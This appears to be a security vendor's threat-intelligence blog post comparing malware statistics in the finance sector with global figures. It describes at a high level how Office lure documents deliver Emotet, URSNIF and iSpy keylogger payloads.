Malscape Snapshot: Finance

Malscape Snapshot: Finance

The Latest 100 Threats Seen in Finance . . .

Inline finance thumbnailLastline® sequences and indexes millions of submissions to our Global Threat Intelligence Network. This snapshot explores the latest 100 malicious samples analyzed by Lastline that target the finance sector or finance departments across industries. This snapshot also compares the statistical data for all threats seen over the last 30 days in finance to the results in the Q4 2017 global Malscape® Monitor Report to highlight differences between threats targeting finance and the broader threat landscape.

The threat samples reflected in this report were submitted to Lastline for analysis after having been scrutinized and released by the upstream gateway, endpoint, and network security technologies. The findings provide insights into more advanced and sophisticated malware samples and threats that are able to evade conventional detection, and therefore don’t reflect the overall threat landscape. Lastline truly acts as The Last Line of Defense®, providing visibility into the advanced threats to organizations that slip past other defenses.

Key Findings In Contrast to Global Findings

Lastline analyzed all threats targeting finance departments and financial services companies over the past 30 days and compared them to global findings shared in the Malscape Monitor Report.

  1. Lastline found that the average number of malicious files that other security controls allow to infiltrate network traffic within the finance sector was one in every 340 email or web transactions (see Figure 1). This is a higher level than the average of 1 in 500 seen across the global malscape. The reason for this could be higher levels of security in the finance sector that more effectively pre-filters files before submitting them to Lastline. And while this may appear in relative terms like a very small number, when one considers the total volume of email attachments received and webpages visited in any given day by financial institutions and finance departments, the volume of malicious samples escaping detection can become quite large.
    Figure 1: The vast majority of files that Lastline analyzes are benign. But still, some malicious files are detected even after being released by other products.

    Figure 1: The vast majority of files that Lastline analyzes are benign. But still, some malicious files are detected even after being released by other products.

  2. Within the finance sector, 30 file types are used to deliver malware, which is lower than the global average of 40 file types, which is not surprising given the narrowing of the sample to one industry. There is also a significant difference in the mix of file types seen in finance as compared to the global landscape, with email related file types such as Microsoft Office docs and rich text format (RTF) documents dominating the sector’s encounter rate (see Figure 2).
    Figure 2: Malicious file type distribution.

    Figure 2: Malicious file type distribution.

  3. Twenty-seven percent of files had previously not been submitted to VirusTotal for analysis, which is a significant deviation from the global average of 65%. This delta could be explained by a more mature security process where finance companies are more rigorous about submitting files to malware portals for detection purposes before submitting them to Lastline.
  4. Sixty-five percent of threats that were submitted to VirusTotal had only generic detections, offering no ability to adapt incident response procedures to correctly remediate the threat. The typical incident response guidance from tools that identify files with these generic descriptions is to restore the device from a known good backup or simply perform a clean re-image. The issue with providing generic guidance is that it does not address the very significant threat posed by malware that is designed to steal credentials, for example. Without knowing what the malware is actually capable of doing, it’s impossible to effectively and completely remediate it.
    Figure 3: AV label detections for findings 3 and 4.

    Figure 3: AV label detections for findings 3 and 4.

  5. One in 10 malware threats displayed advanced behaviors, meaning they’re designed to use packing to avoid static analysis, evade dynamic analysis, remain stealthy, and steal credentials. This is a higher level of advanced threats than what is seen in the global average, which is 1 in 12. The explanation could be that the Finance sector’s more effective security requires a more sophisticated threat to successfully breach a company’s defenses. Figure 4 shows the AV labeling for files exhibiting packer, evasion, stealth and steal behaviors. This classification of threat shows much lower levels of submission to VirusTotal than in finding 3. An explanation is that these behaviors are able to appear benign to security scanning and avoid the submission checks in the security process.
    Figure 4: AV label for threats that have packer, evasion, stealth and steal capabilities.

    Figure 4: AV label for threats that have packer, evasion, stealth and steal capabilities.

The Latest 100 Threats Seen in Finance: Analyzed

Moving to the latest 100 threat reports that specifically target the finance industry we can see that we have captured a Microsoft Office-based campaign. Various office file extensions comprise 62% of the recent file types with the remaining 38% being Portable Executable Files (see Figure 5).

Of the recent file types, 69% are Unclassified in terms of the specific type of malware detected. This means that at time of submission to Lastline they had already been submitted to VirusTotal, but there was no positive detection of maliciousness (see Figure 6). The unclassified rate for Microsoft Office files is 99% in this time frame.

Figure 5: The latest 100 threats seen in finance and their file type.

Figure 5: The latest 100 threats seen in finance and their file type.

Figure 6: The latest 100 threats by the type of malware detected.

Figure 6: The latest 100 threats by the type of malware detected.

These high levels of Microsoft Office documents often share a common lure, an example of which is shown in Figure 7, which demonstrate a consistent set of behaviors, as shown in Figure 8. These documents used Windows scripting utilities like PowerShell to download the final payload, which is often a new variant of sophisticated keylogger malware, URSNIF or Emotet.

Figure 7: Example of a Microsoft Office lure.

Figure 7: Example of a Microsoft Office lure.

Figure 8: Behaviors displayed by the malicious document.

Figure 8: Behaviors displayed by the malicious document.

We can see the infection techniques undertaken by the malicious Office files in Figure 8. Once the user has enabled the content of the Office document, the malware starts to spawn command shell and PowerShell to get the main payload from an Internet address located inside the document. Both main payloads are mature modular trojans that keep adding functionality to their arsenal. And both have a number of pseudonyms, Emotet aka Geodo, Feodo and URSNIFF, aka Gozi, ISFB, Goznym

It’s not only commonalities in the lure document that Emotet and URSNIF share. Emotet first spotted in 2014 shares some of its functional design with URSNIF which dates back to 2007. They also share an evasion module for detecting dynamic analysis environments, and common methods for infiltrating financial transactions such as a man-in-the-middle network sniffing capability and hijacking automated transfer payments. Being modular in nature, criminals have developed and added new features over time, including lateral movement, additional credential theft, and spam capabilities.

Trojan.filerepmalware and Suspicious Filerepmalware are iSpy Keyloggers

In addition to the advanced trojans in URSNIF and Emotet, trojan.filerepmalware also features prominently in the latest 100 threats. Upon further analysis, we could see the explicit behaviors in these samples pointing towards a highly functional Remote Access Trojan (RAT).

Figure 9: Behaviors displayed by trojan.filerepmalware.

Figure 9: Behaviours displayed by trojan.filerepmalware.

By intercepting the communication with the command and control server we found an identifying signature of the iSpy Keylogger tool in the process of exfiltrating website, email, and FTP credentials for this victim as well as license key information for installed products (see Figure 10).

Figure 10: Example of iSpy Keylogger stealing credentials.

Figure 10: Example of iSpy Keylogger stealing credentials.

Figure 11: Criminals, including HawkSpy, are using Twitter to promote the iSpy Keylogger.

Figure 11: Criminals, including HawkSpy, are using Twitter to promote the iSpy Keylogger.

The iSpy Keylogger (see Figure 11 for an example of how it is being promoted by one particular criminal organization) is a variant of the notorious HawkEye logger, a fully functioning keylogger that sends victim credentials via SMTP or FTP to a server under the keylogger operators control. Samples analyzed by Lastline in this time frame sent victim credentials to an outsourcing organization based in India with ISO27001:2013 accreditation. This might indicate victim reuse on behalf of the keylogger operator. Not only are victim credentials used to infiltrate business transactions, but prior victims’ infrastructure also is being used to receive stolen data from new victims.

Conclusion

Banking and finance is not just a vertical industry in its own right, it is also a function that spans every industry. And whether a finance department or a financial services company, it presents an attractive target for criminals.

The threats described in this snapshot are the result of our analysis of all threats targeting finance departments and the financial industry over the past 30 days, plus the 100 latest malware samples submitted by Lastline customers specifically in the financial vertical. There were significant differences in the trends seen as compared to the global average, probably due to (appropriately) heightened levels of security controls in finance. These levels have raised the bar for cyberthreats to successfully infect a device on an internal finance network. The increased sophistication of the attacks that we analyzed in these latest 100 threats – fast evolving email campaigns that avoided detection and professionally developed modular payloads with advanced evasion techniques – demonstrates how criminals have raised the bar in their attacks against a well-prepared finance industry.

To read about the global trends against which we compared our findings in Finance in this snapshot, please download our Q4 2017 Malscape Monitor Report.

Andy Norton

Andy Norton

Andy has been involved in cyber security best practice for over 20 years, specializing in establishing emerging security technologies at Symantec, Cisco and FireEye. In that time, he has presented threat and intelligence briefings for both Bush and Obama administrations, The Cabinet office, the Foreign and Commonwealth office, SWIFT, Swiss National Bank, Prudential Regulation Authority, the Bank of England, The Hong Kong Monetary Authority and NASA. Returning to Europe from Asia in 2011, he has spent the past 5 years helping many of the FTSE 250 companies measure, manage and respond to cyber incidents.
Andy Norton